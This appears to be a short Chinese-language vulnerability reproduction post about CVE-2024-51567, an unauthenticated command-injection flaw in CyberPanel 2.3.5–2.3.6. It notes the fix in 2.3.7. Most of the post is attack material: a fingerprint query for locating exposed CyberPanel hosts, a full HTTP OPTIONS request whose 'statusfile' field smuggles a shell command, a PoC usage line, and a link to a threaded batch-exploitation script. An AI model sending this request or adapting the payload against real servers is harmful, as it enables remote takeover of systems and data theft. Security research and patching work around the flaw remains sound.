该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤,未授权的攻击者可以通过此接口执行任意命令获取服务器权限,从而造成数据泄露、服务器被接管等严重的后果。
影响版本
- CyberPanel v2.3.5
- CyberPanel v2.3.6
目前官方已有可更新版本,建议受影响用户升级至最新版本:CyberPanel >= v2.3.7
漏洞复现
app="CyberPanel"
OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close{"statusfile":"/dev/null; id; #"}
漏洞利用poc
CVE-2024-51567.py url 命令
漏洞批量检测poc
url需要放在当前路径url.txt文件中,使用线程池并发请求。直接执行脚本即可。代码已上传:https://download.csdn.net/download/qq_44159028/89938884?spm=1001.2014.3001.5501